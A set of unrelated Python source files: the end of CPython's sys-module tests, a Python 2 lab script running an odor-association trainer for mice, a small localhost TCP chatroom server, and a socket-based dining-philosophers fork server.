return types.SimpleNamespace(exc_type=type(exc),
exc_value=exc,
exc_traceback=exc.__traceback__,
err_msg=err_msg2,
object=obj)
finally:
# Explicitly break any reference cycle
exc = None
def test_original_unraisablehook(self):
for err_msg in (None, "original hook"):
with self.subTest(err_msg=err_msg):
obj = "an object"
with test.support.captured_output("stderr") as stderr:
with test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
self.write_unraisable_exc(ValueError(42), err_msg, obj)
err = stderr.getvalue()
if err_msg is not None:
self.assertIn(f'Exception ignored {err_msg}: {obj!r}\n', err)
else:
self.assertIn(f'Exception ignored in: {obj!r}\n', err)
self.assertIn('Traceback (most recent call last):\n', err)
self.assertIn('ValueError: 42\n', err)
def test_original_unraisablehook_err(self):
# bpo-22836: PyErr_WriteUnraisable() should give sensible reports
class BrokenDel:
def __del__(self):
exc = ValueError("del is broken")
# The following line is included in the traceback report:
raise exc
class BrokenStrException(Exception):
def __str__(self):
raise Exception("str() is broken")
class BrokenExceptionDel:
def __del__(self):
exc = BrokenStrException()
# The following line is included in the traceback report:
raise exc
for test_class in (BrokenDel, BrokenExceptionDel):
with self.subTest(test_class):
obj = test_class()
with test.support.captured_stderr() as stderr, \
test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
# Trigger obj.__del__()
del obj
report = stderr.getvalue()
self.assertIn("Exception ignored", report)
self.assertIn(test_class.__del__.__qualname__, report)
self.assertIn("test_sys.py", report)
self.assertIn("raise exc", report)
if test_class is BrokenExceptionDel:
self.assertIn("BrokenStrException", report)
self.assertIn("<exception str() failed>", report)
else:
self.assertIn("ValueError", report)
self.assertIn("del is broken", report)
self.assertTrue(report.endswith("\n"))
def test_original_unraisablehook_exception_qualname(self):
# See bpo-41031, bpo-45083.
# Check that the exception is printed with its qualified name
# rather than just classname, and the module names appears
# unless it is one of the hard-coded exclusions.
class A:
class B:
class X(Exception):
pass
for moduleName in 'builtins', '__main__', 'some_module':
with self.subTest(moduleName=moduleName):
A.B.X.__module__ = moduleName
with test.support.captured_stderr() as stderr, \
test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
expected = self.write_unraisable_exc(
A.B.X(), "msg", "obj");
report = stderr.getvalue()
self.assertIn(A.B.X.__qualname__, report)
if moduleName in ['builtins', '__main__']:
self.assertNotIn(moduleName + '.', report)
else:
self.assertIn(moduleName + '.', report)
def test_original_unraisablehook_wrong_type(self):
exc = ValueError(42)
with test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
with self.assertRaises(TypeError):
sys.unraisablehook(exc)
def test_custom_unraisablehook(self):
hook_args = None
def hook_func(args):
nonlocal hook_args
hook_args = args
obj = object()
try:
with test.support.swap_attr(sys, 'unraisablehook', hook_func):
expected = self.write_unraisable_exc(ValueError(42),
"custom hook", obj)
for attr in "exc_type exc_value exc_traceback err_msg object".split():
self.assertEqual(getattr(hook_args, attr),
getattr(expected, attr),
(hook_args, expected))
finally:
# expected and hook_args contain an exception: break reference cycle
expected = None
hook_args = None
def test_custom_unraisablehook_fail(self):
def hook_func(*args):
raise Exception("hook_func failed")
with test.support.captured_output("stderr") as stderr:
with test.support.swap_attr(sys, 'unraisablehook', hook_func):
self.write_unraisable_exc(ValueError(42),
"custom hook fail", None)
err = stderr.getvalue()
self.assertIn(f'Exception ignored in sys.unraisablehook: '
f'{hook_func!r}\n',
err)
self.assertIn('Traceback (most recent call last):\n', err)
self.assertIn('Exception: hook_func failed\n', err)
@test.support.cpython_only
class SizeofTest(unittest.TestCase):
def setUp(self):
self.P = struct.calcsize('P')
self.longdigit = sys.int_info.sizeof_digit
import _testinternalcapi
self.gc_headsize = _testinternalcapi.SIZEOF_PYGC_HEAD
check_sizeof = test.support.check_sizeof
def test_gc_head_size(self):
# Check that the gc header size is added to objects tracked by the gc.
vsize = test.support.calcvobjsize
gc_header_size = self.gc_headsize
# bool objects are not gc tracked
self.assertEqual(sys.getsizeof(True), vsize('') + self.longdigit)
# but lists are
self.assertEqual(sys.getsizeof([]), vsize('Pn') + gc_header_size)
def test_errors(self):
class BadSizeof:
def __sizeof__(self):
raise ValueError
self.assertRaises(ValueError, sys.getsizeof, BadSizeof())
class InvalidSizeof:
def __sizeof__(self):
return None
self.assertRaises(TypeError, sys.getsizeof, InvalidSizeof())
sentinel = ["sentinel"]
self.assertIs(sys.getsizeof(InvalidSizeof(), sentinel), sentinel)
class FloatSizeof:
def __sizeof__(self):
return 4.5
self.assertRaises(TypeError, sys.getsizeof, FloatSizeof())
self.assertIs(sys.getsizeof(FloatSizeof(), sentinel), sentinel)
class OverflowSizeof(int):
def __sizeof__(self):
return int(self)
self.assertEqual(sys.getsizeof(OverflowSizeof(sys.maxsize)),
sys.maxsize + self.gc_headsize)
with self.assertRaises(OverflowError):
sys.getsizeof(OverflowSizeof(sys.maxsize + 1))
with self.assertRaises(ValueError):
sys.getsizeof(OverflowSizeof(-1))
with self.assertRaises((ValueError, OverflowError)):
sys.getsizeof(OverflowSizeof(-sys.maxsize - 1))
def test_default(self):
size = test.support.calcvobjsize
self.assertEqual(sys.getsizeof(True), size('') + self.longdigit)
self.assertEqual(sys.getsizeof(True, -1), size('') + self.longdigit)
def test_objecttypes(self):
# check all types defined in Objects/
calcsize = struct.calcsize
size = test.support.calcobjsize
vsize = test.support.calcvobjsize
check = self.check_sizeof
# bool
check(True, vsize('') + self.longdigit)
# buffer
# XXX
# builtin_function_or_method
check(len, size('5P'))
# bytearray
samples = [b'', b'u'*100000]
for sample in samples:
x = bytearray(sample)
check(x, vsize('n2Pi') + x.__alloc__())
# bytearray_iterator
check(iter(bytearray()), size('nP'))
# bytes
check(b'', vsize('n') + 1)
check(b'x' * 10, vsize('n') + 11)
# cell
def get_cell():
x = 42
def inner():
return x
return inner
check(get_cell().__closure__[0], size('P'))
# code
def check_code_size(a, expected_size):
self.assertGreaterEqual(sys.getsizeof(a), expected_size)
check_code_size(get_cell().__code__, size('6i13P'))
check_code_size(get_cell.__code__, size('6i13P'))
def get_cell2(x):
def inner():
return x
return inner
check_code_size(get_cell2.__code__, size('6i13P') + calcsize('n'))
# complex
check(complex(0,1), size('2d'))
# method_descriptor (descriptor object)
check(str.lower, size('3PPP'))
# classmethod_descriptor (descriptor object)
# XXX
# member_descriptor (descriptor object)
import datetime
check(datetime.timedelta.days, size('3PP'))
# getset_descriptor (descriptor object)
import collections
check(collections.defaultdict.default_factory, size('3PP'))
# wrapper_descriptor (descriptor object)
check(int.__add__, size('3P2P'))
# method-wrapper (descriptor object)
check({}.__iter__, size('2P'))
# empty dict
check({}, size('nQ2P'))
# dict
check({"a": 1}, size('nQ2P') + calcsize(DICT_KEY_STRUCT_FORMAT) + 8 + (8*2//3)*calcsize('n2P'))
longdict = {1:1, 2:2, 3:3, 4:4, 5:5, 6:6, 7:7, 8:8}
check(longdict, size('nQ2P') + calcsize(DICT_KEY_STRUCT_FORMAT) + 16 + (16*2//3)*calcsize('n2P'))
# dictionary-keyview
check({}.keys(), size('P'))
# dictionary-valueview
check({}.values(), size('P'))
# dictionary-itemview
check({}.items(), size('P'))
# dictionary iterator
check(iter({}), size('P2nPn'))
# dictionary-keyiterator
check(iter({}.keys()), size('P2nPn'))
# dictionary-valueiterator
check(iter({}.values()), size('P2nPn'))
# dictionary-itemiterator
check(iter({}.items()), size('P2nPn'))
# dictproxy
class C(object): pass
check(C.__dict__, size('P'))
# BaseException
check(BaseException(), size('5Pb'))
# UnicodeEncodeError
check(UnicodeEncodeError("", "", 0, 0, ""), size('5Pb 2P2nP'))
# UnicodeDecodeError
check(UnicodeDecodeError("", b"", 0, 0, ""), size('5Pb 2P2nP'))
# UnicodeTranslateError
check(UnicodeTranslateError("", 0, 1, ""), size('5Pb 2P2nP'))
# ellipses
check(Ellipsis, size(''))
# EncodingMap
import codecs, encodings.iso8859_3
x = codecs.charmap_build(encodings.iso8859_3.decoding_table)
check(x, size('32B2iB'))
# enumerate
check(enumerate([]), size('n3P'))
# reverse
check(reversed(''), size('nP'))
# float
check(float(0), size('d'))
# sys.floatinfo
check(sys.float_info, vsize('') + self.P * len(sys.float_info))
# frame
import inspect
x = inspect.currentframe()
check(x, size('3Pi3c'))
# function
def func(): pass
check(func, size('14Pi'))
class c():
@staticmethod
def foo():
pass
@classmethod
def bar(cls):
pass
# staticmethod
check(foo, size('PP'))
# classmethod
check(bar, size('PP'))
# generator
def get_gen(): yield 1
check(get_gen(), size('P2PPP4P'))
# iterator
check(iter('abc'), size('lP'))
# callable-iterator
import re
check(re.finditer('',''), size('2P'))
# list
samples = [[], [1,2,3], ['1', '2', '3']]
for sample in samples:
check(list(sample), vsize('Pn') + len(sample)*self.P)
# sortwrapper (list)
# XXX
# cmpwrapper (list)
# XXX
# listiterator (list)
check(iter([]), size('lP'))
# listreverseiterator (list)
check(reversed([]), size('nP'))
# int
check(0, vsize(''))
check(1, vsize('') + self.longdigit)
check(-1, vsize('') + self.longdigit)
PyLong_BASE = 2**sys.int_info.bits_per_digit
check(int(PyLong_BASE), vsize('') + 2*self.longdigit)
check(int(PyLong_BASE**2-1), vsize('') + 2*self.longdigit)
check(int(PyLong_BASE**2), vsize('') + 3*self.longdigit)
# module
check(unittest, size('PnPPP'))
# None
check(None, size(''))
# NotImplementedType
check(NotImplemented, size(''))
# object
check(object(), size(''))
# property (descriptor object)
class C(object):
def getx(self): return self.__x
def setx(self, value): self.__x = value
def delx(self): del self.__x
x = property(getx, setx, delx, "")
check(x, size('5Pi'))
# PyCapsule
# XXX
# rangeiterator
check(iter(range(1)), size('4l'))
# reverse
check(reversed(''), size('nP'))
# range
check(range(1), size('4P'))
check(range(66000), size('4P'))
# set
# frozenset
PySet_MINSIZE = 8
samples = [[], range(10), range(50)]
s = size('3nP' + PySet_MINSIZE*'nP' + '2nP')
for sample in samples:
minused = len(sample)
if minused == 0: tmp = 1
# the computation of minused is actually a bit more complicated
# but this suffices for the sizeof test
minused = minused*2
newsize = PySet_MINSIZE
while newsize <= minused:
newsize = newsize << 1
if newsize <= 8:
check(set(sample), s)
check(frozenset(sample), s)
else:
check(set(sample), s + newsize*calcsize('nP'))
check(frozenset(sample), s + newsize*calcsize('nP'))
# setiterator
check(iter(set()), size('P3n'))
# slice
check(slice(0), size('3P'))
# super
check(super(int), size('3P'))
# tuple
check((), vsize(''))
check((1,2,3), vsize('') + 3*self.P)
# type
# static type: PyTypeObject
fmt = 'P2nPI13Pl4Pn9Pn12PIPP'
s = vsize(fmt)
check(int, s)
# class
s = vsize(fmt + # PyTypeObject
'4P' # PyAsyncMethods
'36P' # PyNumberMethods
'3P' # PyMappingMethods
'10P' # PySequenceMethods
'2P' # PyBufferProcs
'6P')
class newstyleclass(object): pass
# Separate block for PyDictKeysObject with 8 keys and 5 entries
check(newstyleclass, s + calcsize(DICT_KEY_STRUCT_FORMAT) + 32 + 21*calcsize("n2P"))
# dict with shared keys
check(newstyleclass().__dict__, size('nQ2P') + 15*self.P)
o = newstyleclass()
o.a = o.b = o.c = o.d = o.e = o.f = o.g = o.h = 1
# Separate block for PyDictKeysObject with 16 keys and 10 entries
check(newstyleclass, s + calcsize(DICT_KEY_STRUCT_FORMAT) + 32 + 21*calcsize("n2P"))
# dict with shared keys
check(newstyleclass().__dict__, size('nQ2P') + 13*self.P)
# unicode
# each tuple contains a string and its expected character size
# don't put any static strings here, as they may contain
# wchar_t or UTF-8 representations
samples = ['1'*100, '\xff'*50,
'\u0100'*40, '\uffff'*100,
'\U00010000'*30, '\U0010ffff'*100]
asciifields = "nnbP"
compactfields = asciifields + "nPn"
unicodefields = compactfields + "P"
for s in samples:
maxchar = ord(max(s))
if maxchar < 128:
L = size(asciifields) + len(s) + 1
elif maxchar < 256:
L = size(compactfields) + len(s) + 1
elif maxchar < 65536:
L = size(compactfields) + 2*(len(s) + 1)
else:
L = size(compactfields) + 4*(len(s) + 1)
check(s, L)
# verify that the UTF-8 size is accounted for
s = chr(0x4000) # 4 bytes canonical representation
check(s, size(compactfields) + 4)
# compile() will trigger the generation of the UTF-8
# representation as a side effect
compile(s, "<stdin>", "eval")
check(s, size(compactfields) + 4 + 4)
# TODO: add check that forces the presence of wchar_t representation
# TODO: add check that forces layout of unicodefields
# weakref
import weakref
check(weakref.ref(int), size('2Pn2P'))
# weakproxy
# XXX
# weakcallableproxy
check(weakref.proxy(int), size('2Pn2P'))
def check_slots(self, obj, base, extra):
expected = sys.getsizeof(base) + struct.calcsize(extra)
if gc.is_tracked(obj) and not gc.is_tracked(base):
expected += self.gc_headsize
self.assertEqual(sys.getsizeof(obj), expected)
def test_slots(self):
# check all subclassable types defined in Objects/ that allow
# non-empty __slots__
check = self.check_slots
class BA(bytearray):
__slots__ = 'a', 'b', 'c'
check(BA(), bytearray(), '3P')
class D(dict):
__slots__ = 'a', 'b', 'c'
check(D(x=[]), {'x': []}, '3P')
class L(list):
__slots__ = 'a', 'b', 'c'
check(L(), [], '3P')
class S(set):
__slots__ = 'a', 'b', 'c'
check(S(), set(), '3P')
class FS(frozenset):
__slots__ = 'a', 'b', 'c'
check(FS(), frozenset(), '3P')
from collections import OrderedDict
class OD(OrderedDict):
__slots__ = 'a', 'b', 'c'
check(OD(x=[]), OrderedDict(x=[]), '3P')
def test_pythontypes(self):
# check all types defined in Python/
size = test.support.calcobjsize
vsize = test.support.calcvobjsize
check = self.check_sizeof
# _ast.AST
import _ast
check(_ast.AST(), size('P'))
try:
raise TypeError
except TypeError:
tb = sys.exc_info()[2]
# traceback
if tb is not None:
check(tb, size('2P2i'))
# symtable entry
# XXX
# sys.flags
check(sys.flags, vsize('') + self.P * len(sys.flags))
def test_asyncgen_hooks(self):
old = sys.get_asyncgen_hooks()
self.assertIsNone(old.firstiter)
self.assertIsNone(old.finalizer)
firstiter = lambda *a: None
sys.set_asyncgen_hooks(firstiter=firstiter)
hooks = sys.get_asyncgen_hooks()
self.assertIs(hooks.firstiter, firstiter)
self.assertIs(hooks[0], firstiter)
self.assertIs(hooks.finalizer, None)
self.assertIs(hooks[1], None)
finalizer = lambda *a: None
sys.set_asyncgen_hooks(finalizer=finalizer)
hooks = sys.get_asyncgen_hooks()
self.assertIs(hooks.firstiter, firstiter)
self.assertIs(hooks[0], firstiter)
self.assertIs(hooks.finalizer, finalizer)
self.assertIs(hooks[1], finalizer)
sys.set_asyncgen_hooks(*old)
cur = sys.get_asyncgen_hooks()
self.assertIsNone(cur.firstiter)
self.assertIsNone(cur.finalizer)
def test_changing_sys_stderr_and_removing_reference(self):
# If the default displayhook doesn't take a strong reference
# to sys.stderr the following code can crash. See bpo-43660
# for more details.
code = textwrap.dedent('''
import sys
class MyStderr:
def write(self, s):
sys.stderr = None
sys.stderr = MyStderr()
1/0
''')
rc, out, err = assert_python_failure('-c', code)
self.assertEqual(out, b"")
self.assertEqual(err, b"")
if __name__ == "__main__":
unittest.main()
|
fmos_trainer#2_odorassociation.py
|
'''
FMOS Trainer 2 - Freely Moving Olfactory Search - ODOR ASSOCIATION
Written: Teresa Findley, tmfindley15@gmail.com
Last Updated: 04.26.2021
--Records tracking data via OSC communication with custom code in Bonsai (open source computer vision software -- https://bonsai-rx.org/)
--Records signal data through NI USB-6009 data acquisition board
--Controls solenoid and beambreak hardware through Arduino Mega2560 & Teensyduino 2.0
'''
# [SET UP] #
##IMPORTS
##libraries
import numpy as np, cv2, os
import time, math, random, datetime
from timeit import default_timer as timer
import OSC, threading, Queue
import nidaqmx, ctypes
import matplotlib.pyplot as plt
from nidaqmx.constants import AcquisitionType, Edge
from nidaqmx.stream_readers import AnalogMultiChannelReader
##local modules
from fmos_preferences_bonsai import *
import fmos_datamgt, fmos_tracking, fmos_serial
##INITIATE VARIABLES
session_num = 1; trial_num = 1; state = 1;
port_val = leftport; leftcount = 0; rightcount = 0; nosepokecount = 0; msg = 0
last_occupancy = 0; section_occupancy = 0; concentration_setting = 0; response = 1; prep_odor = True; iti_delay = iti_correct; #trial information
correct0=0; total0=0; correct0L=0; total0L=0; correct0R=0; total0R=0;
odor_calibration = np.genfromtxt('D:/FMON_Project/data/olfactometercalibration.txt', delimiter = ',') #odor calibration array
datapath,session_num = fmos_datamgt.CHK_directory(mouse_id,group_name,session_num) #update/create datapath
trialsummary_file = datapath + 'trialsummary.txt'; video_file = datapath + 'videolocation.txt'
notes_file = datapath + 'notes.txt'
ch0_file = datapath + ch0 + '.dat'; ch1_file = datapath + ch1 + '.dat' #NI signal files
ch2_file = datapath + ch2 + '.dat'; ch3_file = datapath + ch3 + '.dat'
nx_file = datapath + 'nosex.dat'; ny_file = datapath + 'nosey.dat' #bonsai tracking files
hx_file = datapath + 'headx.dat'; hy_file = datapath + 'heady.dat'
cx_file = datapath + 'comx.dat'; cy_file = datapath + 'comy.dat'
ts_file = datapath + 'timestamp.dat'
receive_address = ('localhost', 6666); trackingcoords = OSC.OSCServer(receive_address); #bonsai tracking variables
qnosex = Queue.LifoQueue(0); qnosey = Queue.LifoQueue(0); #online position storage
nosex = np.zeros((1,1)); nosey = np.zeros((1,1));
headx = np.zeros((1,1)); heady = np.zeros((1,1))
comx = np.zeros((1,1)); comy = np.zeros((1,1))
ts = np.zeros((1,1));
signaldata = np.zeros((channel_num,buffersize),dtype=np.float64) #NI data collection reading variables
reader = AnalogMultiChannelReader(ni_data.in_stream)
##START UP PROCEDURES
section,section_center=fmos_tracking.calc_partitions() #online tracking: gridline deliniation
fmos_serial.close_all_valves() #turn off all hardware
print 'error'
#Session Summary
#Create/Open Data Files
ch0_handle = open(ch0_file,'ab'); ch1_handle = open(ch1_file,'ab'); ch2_handle = open(ch2_file,'ab'); ch3_handle = open(ch3_file,'ab');
nx_handle = open(nx_file,'ab'); ny_handle = open(ny_file,'ab'); hx_handle = open(hx_file,'ab')
hy_handle = open(hy_file,'ab'); cx_handle = open(cx_file,'ab'); cy_handle = open(cy_file,'ab')
ts_handle = open(ts_file,'ab')
#Bonsai Start Up
trackingcoords.addDefaultHandlers() #add default handlers to the server
def msg_handler(addr, tags, coords, source):
qnosex.put(coords[0]); qnosey.put(coords[1]); #online storage of nose position
nosex[0,0] = coords[0]; nosey[0,0] = coords[1]
headx[0,0] = coords[2]; heady[0,0] = coords[3]
comx[0,0] = coords[4]; comy[0,0] = coords[5]
ts[0,0] = timer()-session_start;
nosex.tofile(nx_handle); nosey.tofile(ny_handle)
headx.tofile(hx_handle); heady.tofile(hy_handle)
comx.tofile(cx_handle); comy.tofile(cy_handle)
ts.tofile(ts_handle)
trackingcoords.addMsgHandler("/2python",msg_handler) #add msg handler function to server
bonsaitracking = threading.Thread( target = trackingcoords.serve_forever ) #put server in parallel thread
bonsaitracking.daemon = True
#NI Set Up
ni_data.ai_channels.add_ai_voltage_chan(channels) #add channels to server
ni_data.timing.cfg_samp_clk_timing(samplingrate, '',Edge.RISING,AcquisitionType.CONTINUOUS,uInt64(buffersize)) #instruct how to sample
def ni_handler(): #define background function to handle incoming NI data
while True:
reader.read_many_sample(signaldata,number_of_samples_per_channel= buffersize, timeout=10.0)
signaldata[0,:].tofile(ch0_handle); signaldata[1,:].tofile(ch1_handle);
signaldata[2,:].tofile(ch2_handle); signaldata[3,:].tofile(ch3_handle);
nisignal = threading.Thread(target = ni_handler) #set handler function in background
nisignal.daemon = True
##INITIATE SESSION
print "Subject " + str(mouse_id) + ", Session " + str(session_num) #report session initiation
print "System Ready. Initiating Data Collection..."
bonsaitracking.start();
nose = [qnosex.get(),qnosey.get()];
session_start = timer() #session timer
ni_data.start(); nisignal.start(); #start data collection
localtime = datetime.datetime.now(); #stamp for video locator
print "Session Started."
# [MAIN CODE] #
while True:
# [State *](occurs in all states)
#Nosepoke & Timer
while ard.inWaiting() > 0: #check nosepoke status
msg = fmos_serial.nose_poke_status(msg)
if timer() - session_start >= session_length:
fmos_serial.close_all_valves()
reasonforend = "Auto Session End"
break
#Online Tracking
nose = [qnosex.get(),qnosey.get()]; #check nose position
section_occupancy = fmos_tracking.detect_mouse_partitions(nose,section_center,
section_occupancy) #section occupancy
if show_active_stats == True: #online trial statistics
frame = cv2.imread('D:/FMON_Project/data/statsbackground.jpeg')
height, width, depth = frame.shape #white background
fraction_correct = "Total: "+str(correct0)
fraction_left = "Left: "+str(correct0L)
fraction_right = "Right: "+str(correct0R)
#Stats Display
cv2.putText(frame,'Percent Correct', (130,(height/2)-40), cv2.FONT_HERSHEY_PLAIN, 1, (0,0,0))
cv2.putText(frame,fraction_correct, (80,(height/2)-20), cv2.FONT_HERSHEY_PLAIN, 1, (0,0,0))
cv2.putText(frame,fraction_left,(80,height/2),cv2.FONT_HERSHEY_PLAIN,1,(0,0,0))
cv2.putText(frame,fraction_right,(80,(height/2)+20),cv2.FONT_HERSHEY_PLAIN,1,(0,0,0))
cv2.imshow('Session Statistics',frame)
##Manual Session Termination
if cv2.waitKey(1) & 0xFF == ord('q'):
fmos_serial.close_all_valves()
reasonforend = "Manual Exit"
break
# [State 1] TRIAL INITIATION
if state == 1:
if prep_odor == True:
low_valve, correctpoke,nameoftrialtype,correctindex,incorrectindex = fmos_datamgt.trial_values(port_val)
active_valve = 1
HairR,LairR,HairL,LairL,Hn2R,Ln2R,Hn2L,Ln2L,activevial,lowvial = fmos_serial.MFC_settings(concentration_setting,odor_calibration,active_valve)
if port_val == 1:
tnsy.write("MFC " + str(port_val) + " " + str(MFC_air) + " " + str(HairR) + "\r")
tnsy.write("MFC " + str(port_val) + " " + str(MFC_n2) + " " + str(Hn2R) + "\r")
tnsy.write("MFC " + str(low_valve) + " " + str(MFC_air) + " " + str(LairL) + "\r")
tnsy.write("MFC " + str(low_valve) + " " + str(MFC_n2) + " " + str(Ln2L) + "\r")
if port_val == 2:
tnsy.write("MFC " + str(port_val) + " " + str(MFC_air) + " " + str(HairL) + "\r")
tnsy.write("MFC " + str(port_val) + " " + str(MFC_n2) + " " + str(Hn2L) + "\r")
tnsy.write("MFC " + str(low_valve) + " " + str(MFC_air) + " " + str(LairR) + "\r")
tnsy.write("MFC " + str(low_valve) + " " + str(MFC_n2) + " " + str(Ln2R) + "\r")
tnsy.write("vialOn " + str(port_val) + " " + str(odor_vial) + "\r")
tnsy.write("vialOn " + str(low_valve) + " " + str(blank_vial) + "\r")
iti_timeout_start = math.floor(timer()) #start vial timer
prep_odor = False #odor has been decided
if (math.floor(timer()) >= math.floor(iti_timeout_start + iti_delay)): #vial mixing timer
if msg == 3:
tstart = timer() - session_start; #timestamp trial start (in ms)
tnsy.write("valve 2 " + str(low_valve) + " on\r") #turn on FVs
tnsy.write("valve " + str(low_valve) + " 1 on\r")
state = 2 #update trial variables
print("Trial " + str(trial_num) + " Activated: " + nameoftrialtype) #report trial start
# [State 2] TRIAL DECISION
if state == 2:
#Frame Count of Section Occupancy
if (section_occupancy == last_occupancy):
if (section_occupancy == correctindex):
counter = counter + 1
else: counter = 0; last_occupancy = section_occupancy
else: counter = 0; last_occupancy = section_occupancy
#Decision Status
if (counter == count_requirement):
print("Response registered: ") #report response
tnsy.write("valve 2 " + str(low_valve) + " off\r") #turn off final valves
tnsy.write("valve " + str(low_valve) + " 1 off\r")
state = 3; counter = 0; #update trial statistics
# [State 3] REWARD DELIVERY
if state == 3:
if port_val == leftport:
if msg == 2:
total0 = total0 + 1; total0L = total0L + 1; correct0 = correct0 + 1; correct0L = correct0L + 1
fmos_serial.deliver_reward(msg) #deliver reward
print("Reward Delivered.") #report reward delivery
tend = timer() - session_start #timestamp trial end & record trial summary info
fmos_datamgt.write_trialsummary(trialsummary_file,trial_num,concentration_setting, port_val,response,tstart,tend)
state = 1; prep_odor = True; iti_delay = iti_correct;trial_num = trial_num + 1; port_val = rightport #update trial variables
if port_val == rightport:
if msg == 1:
total0 = total0 + 1; total0R = total0R + 1; correct0 = correct0 + 1; correct0R = correct0R + 1
fmos_serial.deliver_reward(msg) #deliver reward
print("Reward Delivered.") #report reward delivery
tend = timer() - session_start #timestamp trial end & record trial summary info
fmos_datamgt.write_trialsummary(trialsummary_file,trial_num,concentration_setting, port_val,response,tstart,tend)
state = 1; prep_odor = True; iti_delay = iti_correct;trial_num = trial_num + 1; port_val = leftport #update trial variables
# [SHUT DOWN] #
print "Session Ended." #report end of session
notepad = str(("Please record notes here. Be precise and thorough. Write inside quotation marks with no space at the end.")) + '\n'
#Close All Data Files
ch0_handle.close();ch1_handle.close();ch2_handle.close();ch3_handle.close();
nx_handle.close();ny_handle.close();hx_handle.close();hy_handle.close();cx_handle.close();cy_handle.close(); ts_handle.close()
print "Data Collection Ended" #report end of data collection
##EXIT PROGRAM
fmos_serial.close_all_valves(); cv2.destroyAllWindows(); ard.close(); tnsy.close()
fraction_correct = "T: "+str(correct0)
fraction_left = "L: "+str(correct0L)
fraction_right = "R: "+str(correct0R)
print fraction_correct
print fraction_left
print fraction_right
performance_report = "Total Trials: " + str(correct0)
#Write Video Locator
fmos_datamgt.write_vidlocator(video_file,localtime)
fmos_datamgt.record_notes(notes_file,session_num,localtime,notepad,performance_report)
|
tcp-chatroom.py
|
import threading
import socket
host = '127.0.0.1'
port = 55555
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((host, port))
server.listen()
clients = []
nicknames = []
def broadcast(message):
for client in clients:
client.send(message)
def handel(client):
while True:
try:
message = client.recv(1024)
broadcast(message)
except :
index = clients.index(client)
clients.remove(client)
client.close()
nickname = nicknames[index]
broadcast(f'{nickname} has left the chat'.encode('ascii'))
nicknames.remove(nickname)
break
def receive():
while True:
client, address = server.accept()
print(f'Connected with {str(address)}')
client.send('Joon'.encode('ascii'))
nickname = client.recv(1024).decode('ascii')
nicknames.append(nickname)
clients.append(client)
print(f'Nickanme of the client is {nickname}')
broadcast(f'{nickname} joined the chat'.encode('ascii'))
client.send('Connected to the server'.encode('ascii'))
thread = threading.Thread(target=handel, args=(client,))
thread.start()
print('Server is listening')
receive()
|
mfork.py
|
import socket
import pickle
from threading import Thread
import multiprocessing
import values
class Fork:
def __init__(self,index,host,port):
#ID of each fork process so that philosopher can address it by its index and
# it is easy to pass int message
self.id=index
#Assume that initially all forks are clean
self.is_dirty=False
#forks ip and port
self.host=host
self.port = port
#Each fork process is running at first
self.is_running=True
#-------------------------------METHODS----------------------------------------------
# Consider each fork as a thread. It will run in background
# Create TCP Socket connection. Each fork will act as a socket server
# Forks will receive message from Philosophers (TCP client)
# and send message about fork availability to philosophers
def enable(self):
try:
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
except socket.error as exp:
print("Connection establishment problem " + str(exp))
try:
self.socket.bind((self.host, self.port))
except socket.error as exp:
print("socket bind problem " + str(exp))
self.socket.listen(0)
while self.is_running:
self.server,self.host = self.socket.accept()
Thread(target = self.receive_data,args=(self.server,)).start()
def pickfork(self,philosopher_request,connection):
if self.is_dirty:
sent_data = values.serialize([self.id, philosopher_request[0], values.ACTION_PICK_FORK, values.ACTION_FAIL])
connection.send(sent_data)
print("data received at philosopher : ",str(values.unserialize(sent_data)))
return False
else: # If fork is clean/not being used
self.is_dirty = True
self.current_philosopher = philosopher_request[0]
sent_data = self.serialize([self.id, self.current_philosopher, values.ACTION_PICK_FORK, values.ACTION_SUCCESS])
connection.send(sent_data)
print("data received at philosopher : ",str(values.unserialize(sent_data)))
return True
def dropfork(self,philosopher_request,connection):
# philosopher that was using the fork want to clean the dirty fork and put it down
# only the owner can put this fork down
if self.is_dirty and self.current_philosopher == philosopher_request[0]:
last_user = self.current_philosopher
self.is_dirty = False #celan the fork
self.current_philosopher = None #now the fork belongs to no one and any one of two adjascent philosopher can pick it
connection.send(values.serialize([self.id, last_user, 0, 1])) # let philosophers know the status of this fork
else:
connection.send(values.serialize([self.id, philosopher_request[0], 0, 0]))
def receive_data(self,connection):
while self.is_running:
try:
data = connection.recv(values.DATA_SIZE)
if data:
print("data from philosopher : "+str(values.unserialize(data)))
philosopher_request = values.unserialize(data)
if philosopher_request[1] == values.ACTION_PICK_FORK:
is_successful = self.pickfork(philosopher_request,connection)
if not is_successful:
break
elif philosopher_request[1] == values.ACTION_DROP_FORK:
self.dropfork(philosopher_request,connection)
break
except socket.error as e:
print("error getting data : " + str(e))
#connection.close()
connection.close()
def disable(self):
self.is_running = False
def deserialize(self,data):
return pickle.loads(data)
def serialize(self,data):
return pickle.dumps(data,protocol=2)
#--------------End Class --------------------------
def register_forks():
host = "localhost"
port = 4446
try:
msocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
msocket.sendto(values.serialize(["fork",port]),(values.MONITOR_IP,values.MONITOR_PORT2))
except socket.error as e:
print("Connection error 0: "+str(e))
try:
#this is test
data, server = msocket.recvfrom(values.DATA_SIZE)
data_array = values.unserialize(data)
print(str(data_array))
return data_array
except socket.error as e:
print("Connection error 1: "+str(e))
finally:
msocket.close()
background_forks = []
def timeout(background_forks):
running = True
host = "localhost"
port = 4446
try:
msocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
msocket.sendto(values.serialize(["timeout",port]),(values.MONITOR_IP,values.MONITOR_PORT2))
except socket.error as e:
print("Connection error 0: "+str(e))
while running:
try:
data, server = msocket.recvfrom(values.DATA_SIZE)
data_array = values.unserialize(data)
for p in background_forks:
print("background forks terminated",p)
p.terminate()
running=False
except socket.error as e:
print("Connection error 1: "+str(e))
running=False
pass
def create_forks(data_array):
global background_forks
fork = Fork(data_array[0],data_array[1],data_array[2])
print(fork)
process = multiprocessing.Process(target=fork.enable,args=())
process.start()
background_forks.append(process)
process1 = multiprocessing.Process(target=timeout,args=(background_forks,))
process1.start()
if __name__ == "__main__":
try:
data_array = register_forks()
create_forks(data_array)
except KeyboardInterrupt:
for f in background_forks:
f.terminate()
|
writer.py
|
#
# Copyright (c) 2020, NVIDIA CORPORATION.
#
